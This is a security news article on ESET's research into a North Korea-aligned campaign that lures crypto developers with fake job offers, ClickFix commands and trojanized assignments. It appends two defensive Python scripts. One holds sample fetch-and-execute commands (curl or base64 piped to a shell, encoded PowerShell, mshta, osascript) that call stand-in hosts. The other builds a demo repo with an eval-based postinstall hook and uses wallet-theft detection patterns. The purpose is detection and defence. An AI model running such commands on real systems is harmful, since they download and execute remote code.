North Korean Hackers Target Crypto & Web3 Developers with AkdoorTea
Overview
Slovak cybersecurity firm ESET has published research documenting an escalation in operations by North Korea-aligned threat actors targeting cryptocurrency and Web3 developers. Tracked by ESET as DeceptiveDevelopment, the activity overlaps with campaigns reported elsewhere as Contagious Interview, DEV#POPPER and Void Dokkaebi. The attackers go after developers on Windows, Linux and macOS alike, using social engineering on job platforms to get victims to run the malware themselves.
How the campaign operates
Attackers impersonate recruiters on job sites such as LinkedIn, Upwork, Freelancer and Crypto Jobs List. Typical steps include:
- Initial contact: Fake recruiter outreach offering lucrative developer roles.
- Challenges and assessments: targets are asked to clone and run a coding project, or to complete a video-based interview task; either path ends with the victim executing attacker-controlled code.
- Trojanized deliverables: GitHub repositories or downloadable “assignments” contain obfuscated scripts and installers that drop the malware once the project is built or run.
During fake video interviews the attackers also use a “ClickFix” technique: the victim sees a fabricated camera or microphone error and is told that the fix is to paste a command into a terminal (or PowerShell). The command fetches and runs the payload, so the victim installs the malware with their own hands and no exploit is required.
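One way to turn the ClickFix pattern into a detection check, as an added example that is not part of ESET's research or this article: a heuristic that scores a command line (read from shell history, EDR process telemetry or a clipboard monitor) for fetch-and-execute, hidden-payload and interpreter-handoff indicators. The indicator names, thresholds and sample commands are my own assumptions; the sample commands are constructed, not real lures, and use TEST-NET addresses and the reserved .invalid domain.

```python
"""Heuristic triage for ClickFix-style "paste this to fix your camera" commands.

Added example, not ESET's tooling or code from the article. Indicator names,
thresholds and sample commands are assumptions made for illustration; the
samples use TEST-NET addresses (192.0.2.x) and the reserved .invalid domain.
"""
import re

# Broad on purpose: the goal is to flag commands that fetch-and-execute, decode
# a hidden payload, or hand control to an interpreter or LOLBin, which is what a
# fake "fix" pasted during a video interview relies on.
INDICATORS = [
    ("fetch_pipe_shell", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    ("pipe_to_shell", re.compile(r"\|\s*(sudo\s+)?(ba|z|k)?sh\b")),
    ("base64_decode", re.compile(r"\bbase64\s+(-d|--decode)\b|FromBase64String", re.I)),
    ("powershell_encoded", re.compile(r"\bpowershell(\.exe)?\b.*\s-(e|ec|enc|encodedcommand)\b", re.I)),
    ("powershell_iex", re.compile(r"\b(iex|Invoke-Expression)\b", re.I)),
    ("download_cradle", re.compile(r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient", re.I)),
    ("lolbin", re.compile(r"\b(mshta|certutil|bitsadmin|regsvr32|rundll32)\b", re.I)),
    ("macos_script_host", re.compile(r"\bosascript\b|xattr\s+-d\s+com\.apple\.quarantine")),
    ("inline_python", re.compile(r"\bpython[23]?\s+-c\b")),
    ("eval_of_subshell", re.compile(r"\b(eval|exec)\s+[\"']?\$\(")),
    ("ip_literal_url", re.compile(r"https?://\d{1,3}(\.\d{1,3}){3}")),
]

# Any one of these is enough to block on its own; otherwise two hits are needed.
HIGH_CONFIDENCE = {"fetch_pipe_shell", "powershell_encoded", "download_cradle"}

def triage_command(cmd: str) -> dict:
    """Score one command line and return the matched indicators plus a verdict."""
    hits = [name for name, pat in INDICATORS if pat.search(cmd)]
    if any(h in HIGH_CONFIDENCE for h in hits) or len(hits) >= 2:
        verdict = "block"
    elif hits:
        verdict = "review"
    else:
        verdict = "allow"
    return {"command": cmd, "indicators": hits, "verdict": verdict}

def triage_many(commands) -> list:
    """Triage a sequence of command lines, e.g. lines read from shell history."""
    return [triage_command(c) for c in commands]

# Constructed samples, not real lures: one fake "camera/mic fix" per platform
# and two ordinary developer commands as controls.
SAMPLE_COMMANDS = [
    "curl -fsSL https://cdn.example.invalid/fix-camera.sh | bash",
    # the blob decodes to `curl http://192.0.2.10/a`
    "echo Y3VybCBodHRwOi8vMTkyLjAuMi4xMC9hCg== | base64 -d | sh",
    "powershell -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoA",
    "mshta http://192.0.2.10/cam.hta",
    "osascript -e 'do shell script \"curl -s http://192.0.2.10/k | sh\"'",
    "npm install && npm test",
    "git clone https://git.example.invalid/take-home-task.git",
]

if __name__ == "__main__":
    for r in triage_many(SAMPLE_COMMANDS):
        print(f"{r['verdict']:6} {r['indicators']} :: {r['command']}")
```

Run it over the lines of `~/.bash_history` or `~/.zsh_history`, or feed it whatever collects process command lines on the endpoint; a `block` verdict that coincides with a "video interview" is the cue to stop and verify the recruiter out of band. The heuristics are deliberately noisy (a legitimate `curl | sh` installer trips them too), which is acceptable for a check whose job is to make the user pause rather than to adjudicate.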
Tooling and malware families
ESET’s analysis describes a multi-platform toolkit that mixes custom malware with reused and rented components. Notable pieces include:
- BeaverTail, InvisibleFerret and WeaselStore: information stealers (BeaverTail also acts as a downloader for later stages) that go after cryptocurrency wallets, browser-saved logins and keychain data.
- TsunamiKit: a multi-stage toolkit used for persistence, deployment of .NET spyware and installation of cryptominers (XMRig, NBMiner).
- Tropidoor and PostNapTea: remote access trojans (RATs) with screen-capture and file-exfiltration capabilities, linked to Lazarus-style operations.
- AkdoorTea: the newest backdoor in the set, delivered in a file masquerading as an NVIDIA driver update and typically launched by BeaverTail.
Hybrid threat model: fraud and malware
ESET links DeceptiveDevelopment to North Korea’s broader WageMole scheme, in which covert workers use stolen or AI-generated identities to obtain remote jobs, sometimes with real-time face-swapping during live video interviews to pass as the person on the résumé. Data stolen in the malware campaigns is recycled to build more convincing fake identities and job offers, creating a feedback loop between malware-driven theft and fraudulent hiring.
Why developers and employers should care
Developers stand to lose private keys, wallet contents and credentials; employers risk onboarding fraudulent remote workers who can then operate as insiders. Because the campaign blurs state-sponsored espionage with organised cybercrime, both hiring checks and technical controls need to be tightened.
ESET emphasizes that the operation relies more on creative social engineering and sheer scale than on novel technical tricks: the actors reuse open-source tools, rent malware and adapt dark-web projects to run large volumes of recruitment lures.
Practical defenses
- Verify recruiter identities: confirm the role and the contact through an independent channel (the company’s own careers page or switchboard, not a link in the message) before accepting any task or download.
- Never run untrusted code on a working machine: do not paste commands an interviewer gives you into a terminal, and open take-home projects only inside a disposable VM or container, with dependency install scripts disabled until you have read them.
- Use hardware wallets and strong key management: keep private keys, seed phrases and long-lived API tokens off developer workstations wherever possible, so a stealer finds nothing worth taking.
- Harden hiring processes: require live, interactive identity verification designed to defeat face-swapping, multi-factor validation of identity documents, and robust background checks.
- Deploy endpoint detection and response (EDR) and scan regularly for information stealers and RATs; a terminal spawning a downloader in the middle of a video call is a strong signal worth alerting on.
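A concrete form of the "never run untrusted code" advice, as an added example that is not code from the article or from ESET: a pre-run audit of a cloned assignment that reports npm lifecycle scripts (which execute on a plain `npm install`) and source files carrying obfuscation or credential-access indicators. The indicator list, thresholds and the demo repository (built in a temporary directory) are my own constructions, not a published signature set.

```python
"""Pre-run audit of a cloned "take-home assignment" repository.

Added example, not code from the article or from ESET. It reports the two
things a trojanized assignment usually relies on: npm lifecycle scripts that
run automatically on `npm install`, and source files carrying obfuscation or
credential-access indicators. The indicator list is an assumption, not a
published signature set; the demo repository is constructed in a temp dir.
"""
import json
import re
import tempfile
from pathlib import Path

# Hooks npm runs without being asked; `npm install --ignore-scripts` skips them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")
SCAN_SUFFIXES = {".js", ".mjs", ".cjs", ".ts", ".py", ".sh"}

# (name, pattern): long base64 literals and hex-escaped strings are the usual way
# an obfuscated dropper hides its stage-2 loader and URL inside an innocuous file.
SOURCE_INDICATORS = [
    ("dynamic_eval", re.compile(r"\beval\s*\(|new\s+Function\s*\(|\bexec\s*\(")),
    ("long_base64_literal", re.compile(r"['\"][A-Za-z0-9+/]{120,}={0,2}['\"]")),
    ("hex_escaped_string", re.compile(r"(\\x[0-9a-fA-F]{2}){8,}")),
    ("child_process", re.compile(r"child_process|\bsubprocess\b")),
    ("wallet_or_keychain_path", re.compile(
        r"Local Extension Settings|login\.keychain|\.config/solana|MetaMask|Exodus", re.I)),
    ("home_dir_enumeration", re.compile(r"os\.homedir\(\)|expanduser\(\s*['\"]~")),
]

def scan_source_text(text: str) -> dict:
    """Map each indicator found in a source file's text to its first matching snippet."""
    hits = {}
    for name, pat in SOURCE_INDICATORS:
        m = pat.search(text)
        if m:
            hits[name] = m.group(0)[:40]
    return hits

def audit_package_json(path: Path) -> list:
    """Report every lifecycle hook that would execute during npm install."""
    try:
        data = json.loads(path.read_text(encoding="utf-8"))
    except (OSError, ValueError):
        return []
    scripts = data.get("scripts", {}) if isinstance(data, dict) else {}
    return [{"file": str(path), "indicator": f"lifecycle:{hook}", "detail": cmd}
            for hook, cmd in scripts.items() if hook in LIFECYCLE_HOOKS]

def audit_source(path: Path) -> list:
    try:
        text = path.read_text(encoding="utf-8", errors="replace")
    except OSError:
        return []
    return [{"file": str(path), "indicator": name, "detail": snippet}
            for name, snippet in scan_source_text(text).items()]

def audit_repo(root: Path) -> list:
    """Walk a clone (skipping .git and node_modules) and collect findings."""
    findings = []
    for p in sorted(root.rglob("*")):
        if ".git" in p.parts or "node_modules" in p.parts or not p.is_file():
            continue
        if p.name == "package.json":
            findings.extend(audit_package_json(p))
        elif p.suffix in SCAN_SUFFIXES:
            findings.extend(audit_source(p))
    return findings

def build_sample_repo(root: Path) -> None:
    """Constructed demo repo (not a real lure): a postinstall hook plus an
    'error handler' that evals a base64 blob and can spawn processes."""
    (root / "package.json").write_text(json.dumps({
        "name": "take-home-task",
        "scripts": {"postinstall": "node lib/errors.js", "test": "jest"},
    }))
    (root / "lib").mkdir()
    blob = "QUJD" * 40  # 160 chars of base64 alphabet; the content is irrelevant
    (root / "lib" / "errors.js").write_text(
        "const cp = require('child_process');\n"
        f"const p = '{blob}';\n"
        "eval(Buffer.from(p, 'base64').toString());\n")
    (root / "index.js").write_text("module.exports = () => 'hello';\n")

def run_demo() -> list:
    """Build the constructed repo in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        build_sample_repo(root)
        return audit_repo(root)

if __name__ == "__main__":
    import sys
    findings = audit_repo(Path(sys.argv[1])) if len(sys.argv) > 1 else run_demo()
    for f in findings:
        print(f"{f['indicator']:24} {f['file']}: {f['detail']}")
    if findings:
        print("\nDo not run `npm install` or execute this project outside a throwaway VM.")
```

Point it at a clone (`python audit_repo.py path/to/clone`, assuming that file name) before running anything in it. A `lifecycle:postinstall` finding means a plain `npm install` would already execute the attacker's code; `npm install --ignore-scripts` defers that, but the right answer to any finding in a recruiter's "assignment" is to stop and verify the recruiter, not to keep going.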
Conclusion
The DeceptiveDevelopment campaign highlights a growing trend: attackers combine low-effort, high-scale social engineering with readily available malware to target high-value victims in the crypto and Web3 ecosystem. Developers and hiring organizations must tighten verification and adopt layered security controls to reduce both technical and human-centred risks.

